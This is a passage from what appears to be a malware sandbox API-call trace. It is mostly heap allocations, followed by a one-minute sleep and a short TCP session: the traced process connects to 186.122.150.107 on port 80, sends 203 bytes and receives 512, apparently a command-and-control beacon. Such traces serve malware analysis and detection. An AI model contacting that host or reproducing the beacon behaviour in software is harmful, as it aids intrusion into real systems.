(HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x264fee8 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2650338 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2651af0 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x264f648 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2651028 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x264efd0 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2650560 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2651f40 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x26516a0 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x26518c8 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2650788 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x26509b0 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x26527e0 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2651d18 [0218.565] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x264e958 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2652a08 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2650bd8 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2652168 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x264f870 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2652390 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2687638 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2687a48 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2683538 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2681ee0 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2680ea0 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x26822f0 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x26812b0 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x26814b8 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2683d58 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2683740 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2680478 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x26818c8 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2683330 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2680a90 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2682b10 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2683948 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x268e2f0 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x268e6e0 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x268cd48 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x268fc88 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x268fe80 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x268e8d8 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x268ead0 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x268ecc8 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x268f0b8 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x268a3f0 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x268afc0 [0218.566] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2689a18 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2689c10 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2689820 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x268a5e8 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x268bf80 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265bec8 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265d790 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265d978 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265c0b0 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265a230 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265ca38 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265b910 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265b540 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265cc20 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265a9d0 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265cff0 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265dd48 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265a7e8 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265a600 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265c298 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x265af88 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2618900 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2618ad8 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2615388 [0218.567] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26ec168 [0218.568] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26ea210 [0218.568] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26eb830 [0218.568] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26ed200 [0218.568] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26eb658 [0218.568] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26ece50 [0218.568] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26eba08 [0218.568] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26ea5c0 [0218.568] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26ebf90 [0218.568] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26ead20 [0218.568] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26ea3e8 [0218.568] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26ed960 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26ec518 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x26970f0 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x26972b8 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2694f18 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2693b80 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x26959c8 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2693d48 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2693f10 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2697480 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2697810 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x26979d8 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2697ba0 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2697d68 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2697f30 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2697648 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x26929b0 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2690ef8 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bf398 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bf550 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bf8c0 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26beb00 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bfa78 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26be268 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26c0838 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bfc30 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26be5d8 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bf708 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bfde8 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bffa0 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26becb8 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26c09f0 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bf1e0 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26c0158 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2698288 [0218.569] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2698c78 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269b290 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2698e20 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2699170 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269a8a0 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2699668 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269da50 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269b930 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269e298 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269c4c8 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269e440 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269bad8 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269b788 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269ceb8 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269eae0 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c7a80 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c6c28 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c5770 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c5dd0 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c8740 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c7f48 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c6dc0 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c5908 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c7db0 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c7750 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c5aa0 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c55d8 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c80e0 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c6f58 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c8278 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c78e8 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2664ea0 [0218.570] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2662b68 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2663000 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x26640d8 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2665028 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x26643e8 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2664570 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x26646f8 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2664a08 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x26651b0 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2662238 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2668128 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2666100 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x26682b0 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2666720 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2666ec8 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a1898 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a0e50 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a15a8 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a1b88 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a2748 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a1d00 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a2bb0 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a25d0 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a2168 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a22e0 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a35f8 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a3bd8 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a3308 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a3770 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a44a8 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a57c0 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26ce358 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cddb8 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26ce4c0 [0218.571] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cd548 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26ce790 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26ced30 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cd6b0 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cea60 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cd818 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cd980 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cdae8 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cdc50 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cff78 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cd3e0 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cdf20 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cf000 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ab9b0 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26abf10 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26abb08 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26aaef0 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ab1a0 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ac068 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ab048 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ab5a8 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ab2f8 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ab700 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26abc60 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26abdb8 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26aad98 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ab858 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ab450 [0218.572] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f1b80 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d9000 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d8eb8 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d85c0 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d9148 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d80a0 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d9520 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d81e8 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d8708 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d8998 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d9b88 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d9f60 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d9290 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d9cd0 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d9e18 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d8330 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d8478 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2671e00 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2670e28 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2671098 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2671b90 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2671920 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26716b0 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26711d0 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2671308 [0218.573] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2671440 [0218.574] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26717e8 [0218.574] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2671a58 [0218.581] Sleep (dwMilliseconds=0xea60) [0228.597] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0228.597] socket (af=2, type=1, protocol=6) returned 0x2bc [0228.599] htons (hostshort=0x50) returned 0x5000 [0228.599] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0228.599] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0228.601] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0228.601] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0228.601] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0228.601] connect (s=0x2bc, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0228.858] send (s=0x2bc, buf=0x19d8f8*, len=203, flags=0) returned 203 [0228.858] recv (in: s=0x2bc, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0229.123] closesocket (s=0x2bc) returned 0 [0229.124] WSACleanup () returned 0 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2707880 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2709f50 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2706968 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2706740 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2708570 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x270aa18 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x27098d8 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2708798 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2706db8 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2706fe0 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2707208 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x270a178 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2708be8 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2707658 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2709d28 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2709488 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2707aa8 [0229.124] 